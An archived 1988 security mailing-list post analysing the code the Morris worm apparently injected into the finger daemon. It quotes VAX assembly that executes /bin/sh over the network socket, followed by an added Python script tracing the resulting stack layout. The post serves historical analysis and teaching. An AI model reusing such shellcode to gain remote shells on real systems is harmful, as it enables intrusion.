ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #022 [virus guts.] (1 message, 602 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/022.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.
START OF DOCUMENT
From: Bill Sommerfeld <wesommer@ATHENA.MIT.EDU>
To: phage
Date: Fri 00:50:23 04/11/1988 EST
Subject: virus guts.

The code which is inserted into finger is rather simple:

    mcount+70:      pushl   $68732f         '/sh'
    mcount+76:      pushl   $6e69622f       '/bin'
    mcount+7c:      movl    sp,r10
    mcount+7f:      pushl   $0
    mcount+81:      pushl   $0
    mcount+83:      pushl   r10
    mcount+85:      pushl   $3
    mcount+87:      movl    sp,ap
    mcount+8a:      chmk    $3b             (execve)

For those of you who can't read vax assembler, this does up an "execve", with no arguments, of /bin/sh; since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket...

From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays.

- Bill
END OF DOCUMENT
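
The stack layout the listing above builds, traced by a small interpreter for its three mnemonics. This is an added example, not part of the original message. It assumes the immediates are hexadecimal (as the '/sh' and '/bin' annotations imply) and uses an arbitrary starting stack pointer; the function names are invented for the illustration.

```python
import re
import struct

# The listing from the message, transcribed as text (annotations dropped).
LISTING = """\
mcount+70: pushl $68732f
mcount+76: pushl $6e69622f
mcount+7c: movl sp,r10
mcount+7f: pushl $0
mcount+81: pushl $0
mcount+83: pushl r10
mcount+85: pushl $3
mcount+87: movl sp,ap
mcount+8a: chmk $3b
"""

STACK_TOP = 0x7FFFF000  # constructed starting sp; any aligned value works

def operand(tok, regs):
    # Assumption: '$' immediates are printed in hex; anything else is a register.
    return int(tok[1:], 16) if tok.startswith("$") else regs[tok]

def cstring(mem, addr):
    """Read a NUL-terminated string from the emulated byte-addressed memory."""
    out = bytearray()
    while mem.get(addr, 0):
        out.append(mem[addr])
        addr += 1
    return out.decode("ascii")

def longword(mem, addr):
    return struct.unpack("<I", bytes(mem.get(addr + i, 0) for i in range(4)))[0]

def trace(listing, sp=STACK_TOP):
    """Interpret pushl/movl/chmk and return the system call the listing sets up."""
    regs, mem = {"sp": sp, "r10": 0, "ap": 0}, {}
    for line in listing.splitlines():
        _, op, args = re.match(r"(\S+):\s+(\w+)\s+(\S+)", line).groups()
        if op == "pushl":                  # sp -= 4, store a little-endian longword
            regs["sp"] -= 4
            for i, b in enumerate(struct.pack("<I", operand(args, regs))):
                mem[regs["sp"] + i] = b
        elif op == "movl":                 # VAX operand order is source,destination
            src, dst = args.split(",")
            regs[dst] = operand(src, regs)
        elif op == "chmk":                 # kernel trap; ap -> [count, arg1, arg2, ...]
            ap = regs["ap"]
            a = [longword(mem, ap + 4 * (i + 1)) for i in range(longword(mem, ap))]
            return {"syscall": operand(args, regs), "path": cstring(mem, a[0]),
                    "argv": a[1], "envp": a[2]}
```

Calling `trace(LISTING)` shows why the two longwords are pushed in that order: stored little-endian on a downward-growing stack they sit contiguously as the NUL-terminated path, followed by a three-entry argument list whose argv and envp pointers are both zero.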
| ISSN 1742-948X 01 (Online) | 2005/03/01 | Copyright 2002-2008 securitydigest.org. All rights reserved. |